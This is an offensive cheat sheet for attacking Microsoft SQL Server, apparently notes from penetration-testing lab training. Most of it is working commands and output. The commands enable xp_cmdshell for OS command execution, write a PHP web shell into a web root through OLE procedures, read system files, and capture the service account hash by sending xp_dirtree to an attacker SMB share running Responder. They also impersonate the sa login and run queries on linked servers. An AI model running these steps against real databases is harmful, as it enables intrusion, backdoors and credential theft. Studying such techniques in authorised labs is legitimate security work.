MSSQL

TCP port 1433

Footprinting
- Footprinting using nmap script
- Footprinting using msf
Interacting with MSSQL
Attacking MSSQL
General Info
- MSSQL databases
- Dangerous Settings

Footprinting using nmap script

> sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248

Footprinting using msf

> msf6 auxiliary(scanner/mssql/mssql_ping) 
> set rhosts 10.129.201.248

Connecting to MSSQL w/ python3

> python3 mssqlclient.py Administrator@10.129.201.248 -windows-auth

Interacting w/ MSSQL - SQSH (Linux)

sqsh -S 10.129.20.13 -U username -P Password123

if we want to use Windows Authentication (if enabled) instead of SQL Server Authentication
use SERVERNAME\\accountname or .\\accountname

sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h

Interacting w/ MSSQL - SQLCMD (Windows)

C:\htb> sqlcmd -S 10.129.20.13 -U username -P Password123

for sqlcmd, we need to type GO after our query to execute the SQL syntax

Command Execution through Extended Stored Procedures

1> xp_cmdshell 'whoami'
2> GO

output
-----------------------------
no service\mssql$sqlexpress
NULL
(2 rows affected)

if xp_cmdshell is not enabled, we can enable it as such

-- To allow advanced options to be changed.  
EXECUTE sp_configure 'show advanced options', 1
GO

-- To update the currently configured value for advanced options.  
RECONFIGURE
GO  

-- To enable the feature.  
EXECUTE sp_configure 'xp_cmdshell', 1
GO  

-- To update the currently configured value for this feature.  
RECONFIGURE
GO

Local File Read/Write

Writing Local File

Enable Ole Automation Procedures (requires admin privileges)

1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO

execute stored procedures to write files

1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO

Reading Local Files

1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO

BulkColumn

-----------------------------------------------------------------------------
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to hostnames. Each
# entry should be kept on an individual line. The IP address should

(1 rows affected)

Capture MSSQL Service Hash

on our attacking machine, start Responder or impacket-smbserver

sudo responder -I tun0

note:
or

sudo impacket-smbserver share ./ -smb2support

do this in MSSQL CMD

1> EXEC master..xp_dirtree '\\10.10.15.142\share\'
2> GO

subdirectory    depth
--------------- -----------

1> EXEC master..xp_subdirs '\\10.10.110.17\share\'
2> GO

HResult 0x55F6, Level 16, State 1
xp_subdirs could not access '\\10.10.110.17\share\*.*': FindFirstFile() returned error 5, 'Access is denied.'

Impersonate Existing Users with MSSQL

identify users we can impersonate

1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO

name
-----------------------------------------------
sa
ben
valentin

(3 rows affected)

identify if we're sysadmin

1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go

-----------
julio                                                                                                                    

(1 rows affected)

-----------
          0

(1 rows affected)

returned 0, we're not

impersonate as sa

1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO

-----------
sa

(1 rows affected)

-----------
          1

(1 rows affected)

Communicate with Other Databases with MSSQL

lateral movement to other databases

identify linked servers

1> SELECT srvname, isremote FROM sysservers
2> GO

srvname                             isremote
----------------------------------- --------
DESKTOP-MFERMN4\SQLEXPRESS          1
10.0.0.12\SQLEXPRESS                0

(2 rows affected)

execute commands

1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO

------------------------------ ------------------------------ ------------------------------ -----------
DESKTOP-0L9D4KA\SQLEXPRESS     Microsoft SQL Server 2019 (RTM sa_remote                                1

(1 rows affected)

MSSQL databases

Default System Database	Description
`master`	Tracks all system information for an SQL server instance
`model`	Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created after changes to the model database
`msdb`	The SQL Server Agent uses this database to schedule jobs & alerts
`tempdb`	Stores temporary objects
`resource`	Read-only database containing system objects included with SQL server

Dangerous Settings

MSSQL clients not using encryption to connect to the MSSQL server
The use of self-signed certificates when encryption is being used. It is possible to spoof self-signed certificates
The use of named pipes
Weak & default sa credentials. Admins may forget to disable this account